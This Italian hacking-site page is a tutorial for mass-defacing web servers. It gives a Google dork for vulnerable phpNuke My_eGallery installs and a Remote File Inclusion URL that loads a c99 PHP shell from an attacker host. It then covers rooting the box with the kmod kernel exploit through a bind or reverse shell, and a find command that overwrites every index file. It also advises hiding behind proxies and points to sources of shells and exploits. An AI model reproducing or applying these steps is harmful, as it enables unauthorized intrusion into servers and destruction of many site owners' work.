(¯`·._.·[°o.OKinG-InFeTO.o°]·._.·´¯)


Vai ai contenuti

Menu principale:


Guida al Mass-Deface

Hå¢kÎñG > ÐêFå¢ìÑg

 Mass Deface V 1.0 by Zapata Vive!!! aka KingOfSka

, http://gr4h4m.wordpress.com

http://www.cpc.info.ms
http://www.contropoterecrew.info.ms

Prima di tutto imparate e convincetevi di 1 cosa: non e’ come nei film che arriva uno, pigia una serie di tasti a cazzo sulla tastiera ed ha accesso ai pc dell NSA o ti fa esplodere il pc…
Detto cio’,in questa guida spieghero’ nella maniera piu’ breve e semplice possibile come fare un bel mass deface su un server, tenete presente che non si puo’ fare SEMPRE , ma solo sui server vulnerabili di cui si parlerà piu’ avanti.

1.1 — Cosa Dovete Sapere:

Conoscenza base di Linux
Comandi Generici delle Shell Linux
Conoscienza base di PHP
Conoscienza Base di Html
Come compilare un programma c per Linux

Se non sapete fare queste cose, esiste google, con tanti manuali, guide. e tutorial, non chiedetemi cose del tipo “compili l’exploit per me e me lo invii?”…

1.2 — Cosa Dovete Avere:

Un pc con connessione internet lol
Una buona lista di proxy
Tanto tempo da perdere dietro al pc

2.0 — Si inizia

La tecninca che vi spieghero’ consiste in 4 punti:
1: Trovare un sito web vulnerabile
1.1: Il Bug Wink
2: La shell in PHP
2.2: Entriamo in Azione Wink
3: Ottenere i privilegi di root
4: Sovrascrivere tutti gli index di tutti i siti ospitati in un unico server

2.0 — Remote File Inclusion e phpNuke:

Ci sono tanti tipi di vulnerabilità , quella che serve a noi ora e’ il Remote File Inclusion. Che e’ ? Semplice, consiste nel far eseguire ad un server uno script PHP hostato su un altro server.
Come esempio useremo un bug del modulo My_eGallery di phpNuke, per trovare i siti vulnerabili c’e’ il nostro miglior amico dopo il Pinguino, Google.
Fate una semplice ricerca con “allinurl:my_eGallery” come parola chiave, e vedrete tutti i siti indicizzati da google che usano questo modulo.

2.1 — Il Bug

Il bug che sfrutteremo risiede nelle versioni del modulo My_eGallery precedenti alla 3.1.1 g.

http://www.vittima.it/modules/My_eGallery/public/displayCategory.php?basepath=http://sitocattivo.com/shell.jpg

Che significa ? inviando un URL come questo dal nostro browser faremo eseguire lo script shell.jpg , che e’ in un altro host (http://sitocattivo.com) , sul server vittima.
Ma se volevamo una shell in PHP perche’ e’ .jpg ???
Se fosse shell.php , lo script verrebbe interpretato sul server che lo hosta, e noi invece vogliamo che sia interpretato (eseguito…) sul server vittima.

2.2 — La Shell in PHP:

Cos’e’ una shell spero lo sappiate, la cosa bella e’ che si possono creare degli script in php che ci permettono di eseguiri comandi da remoto, attraverso il nostro browser web (IE sucks ! Firefox Rulez : www.getfirefox.com) come se avessimo accesso diretto al server.La migliore shell in PHP , a mio avviso e’ la c99 shell del Captain Crunch Team,
ha un sacco di opzioni, e pure il tasto “Mass Deface” per i piu’ imbranati…
Quindi recuperatela, se non sapete dove trovarla (Google Rulez) guardate in fondo alla pagina nella sezione link…

2.3 — Incominciamo sul serio

Supponiamo che abbiate scoperto con google che il sito vittima.it abbia installato my_eGallery , e che la vostra shell sia su sitocattivo.com/shell,jpg
Con il nostro browser . ben proxati, colleghiamoci all’url:

http://www.vittima.it/modules/My_eGallery/public/displayCategory.php?basepath=http://sitocattivo.com/shell.jpg

Se vi beccate un messaggio tipo “Were you trying to hack our site or server ??? Go Away Bastard” evidentemente non si puo’ fare niente…
Se al contrario vediamo la rassicurante scritta “! c99 Shell !” allora possiamo essere un po’ contenti Wink
Nella parte alta della shell, vedrete un bel po’ di informazioni sul pc che funge da server, come OS , ip , versione del web server e altro..

———————————————————————————-
Software: Apache/1.3.6 (Unix) (Red Hat/Linux) PHP/4.3.1
uname -a: Linux sito.host.it 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Safe-mode: OFF (not secure)
Directory: /www/sito.com/ rwxrwxrwx
Free 2.83 GB of 13.27 GB (21.3%)
—————————————————————————————

Queste informazioni, si ottengono sui server Linux con il comando “uname -a” ,
se vedete che non siamo su un server Linux per ora lasciamo stare…
Tra queste info, vedrete la versione del Kernel, il “cuore” di linux, che pero’ , purtroppo e per fortuna e’ pieno di bug che ci permetteranno , da user pezzente (nobody) senza privilegi, di diventare root , ovvero il dio del sistema Wink
Per questo esempio porremo che il server abbia come SO Linux con kernel 2.2.5-15.
Ora ci faremo un giretto nel server…
Continuate a risalire le directory, finche’ , se tutto va bene, arriverete alla cartella /www/ , contente una serie di sottocartelle , con ciascuna il nome di un sito internet.
Per evitare che in maniera così semplice si possano defacciare tutti i siti ospitati e avere il completo controllo del server, esistono i diversi user, ciascuno con i loro privilegi, Noi ora siamo “nobody” (potete controllare con il comando “whoami”) , e abbiamo accesso solo alle cartelle con chmod 777 , ovvero quelle scrivibili da tutti, in generale sono cartelle settate in questo modo per permettere l’upload i immagini o file.
Cerchiamo una cartella nella quale abbiamo pieno accesso, nella C99 sono evidenziate in verde.

3 — Roooooooooooooooooooooooot

E come facciamo a diventare root ??
Exploitiamo il kernel Wink
L’exploit che ci serve e’ quello del “kmod” , si trova anche troppo facilmente da google, scarichiamolo, uppiamolo sul server con la funzione upload della C99, e compiliamolo, gcc kmod.c - kmod ….
Chmoddiamolo a 777 per ottenere il permesso di eseguirlo e siamo a posto Wink
Ora usiamo la funzione “bind” di C99 , che ci crea una shell sul server a cui possiamo accedere da remoto con Netcat o Telnet.
Settiamola sulla porta che preferiamo , e facciamo bind, se il server non e’ protetto da firewall dovrebbe essere a posto, se no provate la reverse shell altrimenti si parlerà piu’ avanti di come fregare sti firewall Smile
Connettiamo alla nostra shell, e facciamo un “id” come risposta dovremmo ottenere:

——————————————————–
uid=99(nobody) gid=99(nobody) groups=99(nobody)
——————————————————–

che ci conferma l’inutilità del nostro user…
Ora eseguiamo l’exploit con ./kmod , rifacciamo “id” e se tutto va come previsto:

—————————————————————————————-
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—————————————————————————————-

ed ora possiamo tutto Wink

4 — Ed ora la parte cattiva…

E quì si differenziano le persone, c’e’ chi sovrascrive tutti gli index.html e defaccia le home, chi cerca un file inutile e lo sovrascrive per segnalare la sua presenza senza fare danni, e chi lascia semplicemente un file in /root per avvisare l’admin…
visto che creare un file in /root e scriverci dentro, penso lo sappiate fare (o almeno spero…) vediamo come defacciare le home Wink
In questo caso ci torna comodo il comando “find” di Linux:

———————————————————
find / -name “index.*” -exec cp nostroindex.html {} \;
———————————————————

Che fa questo comando ?? dice al nostro pinguino di cercare tutti i file “index.html” , quindi .php, .shtml, .e così via a partire dalla directory / e in tutte le sue subdirectory, quando lo ha trovato, lo sovrascrive con il nostro file “nostroindex.html” che deve essere nella stessa directory dalla quale eseguiamo il comando.
Finito! Siete contenti ? Siete riusciti in poco tempo a fare un bel casino, personalmente non mi piace defacciare le home, piuttosto che sentirmi 50 webmaster tirarmi addosso i cristoni per aver rovinato il loro lavoro, preferisco lasciare un messaggio e sentire poi i webmaster stessi che ringraziano per aver evitato loro guai peggiori.. Per maggiori info visitate il sito o mandatemi una mail, non fate troppi danni…

Link:

http://www.zone-h.com => database mondiale dei defacements
http://www.cpc.info.ms => Il sito della Contro Potere Crew, fateci un salto se vi serve materiale tipo le shell o gli exploit Wink
http://www.google.com => Il vostro migliore amico dopo il pinguino

Thanks to:

Defacers Messico
Hackzatan ( NeoSecurity Team )
Waraxe
erg0t (säurE)
La Ganja e il Fumello per i bei momenti di riflessione Wink
La Franziskaner per i litri che scorrono i sabato sera Wink
Il Golden Virgina , non fumate sigarette, meglio il tabacco!!!
Sub. Comandante Insurgente Marcos , dell ‘EZLN e per tutta la gente che ogni giorno lotta e muore per un mondo migliore.
Banda Bassotti, Sud Sound Sytem, Jaka, Los Fastidios, Merdonalds, Klasse Kriminale, 99 Posse, e tutti quelli che fanno buona musica Wink

Fuckz to:

La polizia che abusa del suo potere e fa applicare leggi ingiuste
Bush ! grandissimo uomo che come dicono gli Al Mukawama “sta sempre sconvolto ad alcool e cocaina quando prende le sue decisioni”
Fini e la sua legge di merda contro le droghe !! Erba Libera !!
Berlusconi e tutto il suo governo di ladri
La Moratti e la sua riforma del cazzo
Forza Nuova , Fascismo e Libertà , e tutte queste di cazzo che ogni mese picchiano, accoltellano, fanno agguati ai compagni, tornate nelle fogne !!!
Hacker Journal: che rivista… parlano molto ma non combinano nulla, personalmente la compravo moooooolto tempo fa, non ho mai imparato nulla….

Creative Commons License
Questo sito è pubblicato sotto una Licenza Creative Commons

Home Page | Regole dell'Hacker | Contattaci | Hå¢kÎñG | VìRû§ | Video TuToRial | Hå¢kÎñG M§Ñ | ÐC++ | Wìñdøw$ Xþ | Mappa del sito


Sito protetto da CoPyRiGhT 2008/2009 | [email protected]

Torna ai contenuti | Torna al menu